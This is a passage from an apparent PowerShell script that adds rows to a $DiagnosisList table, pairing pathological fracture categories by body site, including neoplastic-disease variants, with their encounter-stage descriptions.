ulna and radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ulna and radius","Pathological fracture, unspecified ulna and radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ulna and radius","Pathological fracture, unspecified ulna and radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ulna and radius","Pathological fracture, unspecified ulna and radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ulna and radius","Pathological fracture, unspecified ulna and radius, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right hand","Pathological fracture, right hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right hand","Pathological fracture, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right hand","Pathological fracture, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right hand","Pathological fracture, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right hand","Pathological fracture, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right hand","Pathological fracture, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left hand","Pathological fracture, left hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left hand","Pathological fracture, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left hand","Pathological fracture, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left hand","Pathological fracture, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left hand","Pathological fracture, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left hand","Pathological fracture, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified hand","Pathological fracture, unspecified hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified hand","Pathological fracture, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified hand","Pathological fracture, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified hand","Pathological fracture, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified hand","Pathological fracture, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified hand","Pathological fracture, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right finger(s)","Pathological fracture, right finger(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right finger(s)","Pathological fracture, right finger(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right finger(s)","Pathological fracture, right finger(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right finger(s)","Pathological fracture, right finger(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right finger(s)","Pathological fracture, right finger(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right finger(s)","Pathological fracture, right finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left finger(s)","Pathological fracture, left finger(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left finger(s)","Pathological fracture, left finger(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left finger(s)","Pathological fracture, left finger(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left finger(s)","Pathological fracture, left finger(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left finger(s)","Pathological fracture, left finger(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left finger(s)","Pathological fracture, left finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified finger(s)","Pathological fracture, unspecified finger(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified finger(s)","Pathological fracture, unspecified finger(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified finger(s)","Pathological fracture, unspecified finger(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified finger(s)","Pathological fracture, unspecified finger(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified finger(s)","Pathological fracture, unspecified finger(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified finger(s)","Pathological fracture, unspecified finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right femur","Pathological fracture, right femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right femur","Pathological fracture, right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right femur","Pathological fracture, right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right femur","Pathological fracture, right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right femur","Pathological fracture, right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right femur","Pathological fracture, right femur, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left femur","Pathological fracture, left femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left femur","Pathological fracture, left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left femur","Pathological fracture, left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left femur","Pathological fracture, left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left femur","Pathological fracture, left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left femur","Pathological fracture, left femur, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified femur","Pathological fracture, unspecified femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified femur","Pathological fracture, unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified femur","Pathological fracture, unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified femur","Pathological fracture, unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified femur","Pathological fracture, unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified femur","Pathological fracture, unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, pelvis","Pathological fracture, pelvis, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, pelvis","Pathological fracture, pelvis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, pelvis","Pathological fracture, pelvis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, pelvis","Pathological fracture, pelvis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, pelvis","Pathological fracture, pelvis, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, pelvis","Pathological fracture, pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, hip, unspecified","Pathological fracture, hip, unspecified, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, hip, unspecified","Pathological fracture, hip, unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, hip, unspecified","Pathological fracture, hip, unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, hip, unspecified","Pathological fracture, hip, unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, hip, unspecified","Pathological fracture, hip, unspecified, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, hip, unspecified","Pathological fracture, hip, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right tibia","Pathological fracture, right tibia, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right tibia","Pathological fracture, right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right tibia","Pathological fracture, right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right tibia","Pathological fracture, right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right tibia","Pathological fracture, right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right tibia","Pathological fracture, right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left tibia","Pathological fracture, left tibia, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left tibia","Pathological fracture, left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left tibia","Pathological fracture, left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left tibia","Pathological fracture, left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left tibia","Pathological fracture, left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left tibia","Pathological fracture, left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right fibula","Pathological fracture, right fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right fibula","Pathological fracture, right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right fibula","Pathological fracture, right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right fibula","Pathological fracture, right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right fibula","Pathological fracture, right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right fibula","Pathological fracture, right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left fibula","Pathological fracture, left fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left fibula","Pathological fracture, left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left fibula","Pathological fracture, left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left fibula","Pathological fracture, left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left fibula","Pathological fracture, left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left fibula","Pathological fracture, left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified tibia and fibula","Pathological fracture, unspecified tibia and fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified tibia and fibula","Pathological fracture, unspecified tibia and fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified tibia and fibula","Pathological fracture, unspecified tibia and fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified tibia and fibula","Pathological fracture, unspecified tibia and fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified tibia and fibula","Pathological fracture, unspecified tibia and fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified tibia and fibula","Pathological fracture, unspecified tibia and fibula, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ankle","Pathological fracture, right ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ankle","Pathological fracture, right ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ankle","Pathological fracture, right ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ankle","Pathological fracture, right ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ankle","Pathological fracture, right ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ankle","Pathological fracture, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ankle","Pathological fracture, left ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ankle","Pathological fracture, left ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ankle","Pathological fracture, left ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ankle","Pathological fracture, left ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ankle","Pathological fracture, left ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ankle","Pathological fracture, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ankle","Pathological fracture, unspecified ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ankle","Pathological fracture, unspecified ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ankle","Pathological fracture, unspecified ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ankle","Pathological fracture, unspecified ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ankle","Pathological fracture, unspecified ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ankle","Pathological fracture, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right foot","Pathological fracture, right foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right foot","Pathological fracture, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right foot","Pathological fracture, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right foot","Pathological fracture, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right foot","Pathological fracture, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right foot","Pathological fracture, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left foot","Pathological fracture, left foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left foot","Pathological fracture, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left foot","Pathological fracture, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left foot","Pathological fracture, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left foot","Pathological fracture, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left foot","Pathological fracture, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified foot","Pathological fracture, unspecified foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified foot","Pathological fracture, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified foot","Pathological fracture, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified foot","Pathological fracture, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified foot","Pathological fracture, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified foot","Pathological fracture, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right toe(s)","Pathological fracture, right toe(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right toe(s)","Pathological fracture, right toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right toe(s)","Pathological fracture, right toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right toe(s)","Pathological fracture, right toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right toe(s)","Pathological fracture, right toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right toe(s)","Pathological fracture, right toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left toe(s)","Pathological fracture, left toe(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left toe(s)","Pathological fracture, left toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left toe(s)","Pathological fracture, left toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left toe(s)","Pathological fracture, left toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left toe(s)","Pathological fracture, left toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left toe(s)","Pathological fracture, left toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified toe(s)","Pathological fracture, unspecified toe(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified toe(s)","Pathological fracture, unspecified toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified toe(s)","Pathological fracture, unspecified toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified toe(s)","Pathological fracture, unspecified toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified toe(s)","Pathological fracture, unspecified toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified toe(s)","Pathological fracture, unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, other site","Pathological fracture, other site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, other site","Pathological fracture, other site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, other site","Pathological fracture, other site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, other site","Pathological fracture, other site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, other site","Pathological fracture, other site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, other site","Pathological fracture, other site, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified site","Pathological fracture in neoplastic disease, unspecified site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified site","Pathological fracture in neoplastic disease, unspecified site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified site","Pathological fracture in neoplastic disease, unspecified site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified site","Pathological fracture in neoplastic disease, unspecified site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified site","Pathological fracture in neoplastic disease, unspecified site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified site","Pathological fracture in neoplastic disease, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right shoulder","Pathological fracture in neoplastic disease, right shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right shoulder","Pathological fracture in neoplastic disease, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right shoulder","Pathological fracture in neoplastic disease, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right shoulder","Pathological fracture in neoplastic disease, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right shoulder","Pathological fracture in neoplastic disease, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right shoulder","Pathological fracture in neoplastic disease, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left shoulder","Pathological fracture in neoplastic disease, left shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left shoulder","Pathological fracture in neoplastic disease, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left shoulder","Pathological fracture in neoplastic disease, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left shoulder","Pathological fracture in neoplastic disease, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left shoulder","Pathological fracture in neoplastic disease, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left shoulder","Pathological fracture in neoplastic disease, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified shoulder","Pathological fracture in neoplastic disease, unspecified shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified shoulder","Pathological fracture in neoplastic disease, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified shoulder","Pathological fracture in neoplastic disease, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified shoulder","Pathological fracture in neoplastic disease, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified shoulder","Pathological fracture in neoplastic disease, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified shoulder","Pathological fracture in neoplastic disease, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right humerus","Pathological fracture in neoplastic disease, right humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right humerus","Pathological fracture in neoplastic disease, right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right humerus","Pathological fracture in neoplastic disease, right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right humerus","Pathological fracture in neoplastic disease, right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right humerus","Pathological fracture in neoplastic disease, right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right humerus","Pathological fracture in neoplastic disease, right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left humerus","Pathological fracture in neoplastic disease, left humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left humerus","Pathological fracture in neoplastic disease, left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left humerus","Pathological fracture in neoplastic disease, left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left humerus","Pathological fracture in neoplastic disease, left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left humerus","Pathological fracture in neoplastic disease, left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left humerus","Pathological fracture in neoplastic disease, left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified humerus","Pathological fracture in neoplastic disease, unspecified humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified humerus","Pathological fracture in neoplastic disease, unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified humerus","Pathological fracture in neoplastic disease, unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified humerus","Pathological fracture in neoplastic disease, unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified humerus","Pathological fracture in neoplastic disease, unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified humerus","Pathological fracture in neoplastic disease, unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ulna","Pathological fracture in neoplastic disease, right ulna, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ulna","Pathological fracture in neoplastic disease, right ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ulna","Pathological fracture in neoplastic disease, right ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ulna","Pathological fracture in neoplastic disease, right ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ulna","Pathological fracture in neoplastic disease, right ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ulna","Pathological fracture in neoplastic disease, right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ulna","Pathological fracture in neoplastic disease, left ulna, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ulna","Pathological fracture in neoplastic disease, left ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ulna","Pathological fracture in neoplastic disease, left ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ulna","Pathological fracture in neoplastic disease, left ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ulna","Pathological fracture in neoplastic disease, left ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ulna","Pathological fracture in neoplastic disease, left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right radius","Pathological fracture in neoplastic disease, right radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right radius","Pathological fracture in neoplastic disease, right radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right radius","Pathological fracture in neoplastic disease, right radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right radius","Pathological fracture in neoplastic disease, right radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right radius","Pathological fracture in neoplastic disease, right radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right radius","Pathological fracture in neoplastic disease, right radius, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left radius","Pathological fracture in neoplastic disease, left radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left radius","Pathological fracture in neoplastic disease, left radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left radius","Pathological fracture in neoplastic disease, left radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left radius","Pathological fracture in neoplastic disease, left radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left radius","Pathological fracture in neoplastic disease, left radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left 